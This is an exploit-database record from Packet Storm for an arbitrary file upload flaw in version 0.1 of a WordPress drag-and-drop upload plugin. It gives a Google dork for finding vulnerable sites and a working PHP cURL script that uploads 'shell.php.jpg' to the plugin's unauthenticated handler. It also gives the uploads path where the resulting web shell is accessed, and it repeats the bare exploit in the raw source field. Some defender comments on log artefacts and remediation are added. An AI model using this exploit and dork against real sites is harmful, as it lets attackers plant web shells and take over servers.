ID PACKETSTORM:113503
Type packetstorm
Reporter Adrien Thierry
Modified 2012-06-12T00:00:00
Description
`###########################################################
#
# Exploit Title: Wordpress drag and drop file upload 0.1 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.ali.dj/
# Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip
# Version: 0.1
#
###########################################################
Vulnerable page: http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php
exploit :
<?php
// Proof of concept from the advisory: sends a single multipart POST carrying a
// local file to the plugin's dnd-upload.php handler and prints the response.
// The request as written sets no cookie, nonce or other credential.
// NOTE(review): the advisory title calls this an arbitrary file upload, so the
// handler presumably does not restrict the uploaded file's type; the handler
// source is not shown on this page, so confirm against the plugin code.
//
// Defender notes: the artefacts of this request are a POST to
// .../plugins/drag-drop-file-uploader/dnd-upload.php in the web access log and
// a new file under wp-content/uploads/[YYYY]/[MM]/ (the path the advisory
// lists). Removing the plugin and denying script execution in the uploads
// directory addresses both the entry point and the impact.

// Local file to send. The name ends in .jpg but also contains .php.
// NOTE(review): whether a stored file with this name is executed as PHP depends
// on how the web server maps extensions to handlers; verify on the host.
$u="shell.php.jpg";
// Target here is a loopback test install (127.0.0.1/wp).
$c = curl_init("http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php");
curl_setopt($c, CURLOPT_POST, true);
// A leading "@" in a POSTFIELDS array value is the legacy PHP cURL syntax for
// attaching the file at that path; 'file' is the form field name being sent.
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u"));
// Have curl_exec() return the response body instead of printing it directly.
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
// Print whatever the upload handler answered.
echo $e;
?>
Shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg
#####################################################################
`
{"id": "PACKETSTORM:113503", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Drag And Drop File Upload 0.1 Shell Upload", "description": "", "published": "2012-06-12T00:00:00", "modified": "2012-06-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/113503/WordPress-Drag-And-Drop-File-Upload-0.1-Shell-Upload.html", "reporter": "Adrien Thierry", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:24:53", "viewCount": 3, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:24:53", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:24:53", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/113503/wpdragdrop-shell.txt", "sourceData": "`########################################################### \n# \n# Exploit Title: Wordpress drag and drop file upload 0.1 Arbitrary File Upload \n# Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/ \n# Date: 11/06/2012 \n# Exploit Author: Adrien Thierry \n# Vendor Homepage: http://www.ali.dj/ \n# Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip \n# Version: 0.1 \n# \n########################################################### \n \nVuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php \n \nexploit : \n \n<?php \n$u=\"shell.php.jpg\"; \n$c = curl_init(\"http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php\"); \ncurl_setopt($c, CURLOPT_POST, true); \ncurl_setopt($c, CURLOPT_POSTFIELDS, \narray('file'=>\"@$u\")); \ncurl_setopt($c, CURLOPT_RETURNTRANSFER, 1); \n$e = curl_exec($c); \ncurl_close($c); \necho $e; \n?> \n \nShell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg \n \n##################################################################### \n`\n", "immutableFields": []}
{}